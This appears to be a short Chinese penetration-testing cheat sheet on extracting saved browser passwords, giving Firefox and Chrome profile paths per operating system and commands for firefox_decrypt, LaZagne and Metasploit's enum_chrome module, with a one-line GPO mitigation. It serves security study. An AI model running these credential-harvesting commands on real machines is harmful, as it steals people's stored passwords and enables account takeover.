权限: User

浏览器

Firefox 配置文件

  1. # Linux
  2. /home/<Username>/.mozilla/firefox/xxxx.default
  4. # MacOS
  5. /Users/<Username>/Library/Application\ Support/Firefox/Profiles/xxxx.default'
  7. # Windows
  8. C:\Users\<Username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxx.default

Chrome配置文件

  1. # Linux
  2. /home/<Username>/.config/google-chrome/default
  4. # MacOS
  5. Users/<Username>/Library/Application Support/Google/Chrome/Default
  7. # Windows
  8. C:\Users\<Username>\AppData\Local\Google\Chrome\User Data\Default

Firefox_decrypt

Firefox

Link: https://github.com/unode/firefox_decrypt

  1. python3 firefox_decrypt.py <ProfileFolder>

Web 浏览器 - 图1

laZagne

  1. laZagne.exe browsers browsers

MSF

  1. # chrome
  2. use post/windows/gather/enum_chrome

Web 浏览器 - 图2

缓解

使用 GPO 禁用 Chrome、Edge 和 Firefox 密码管理器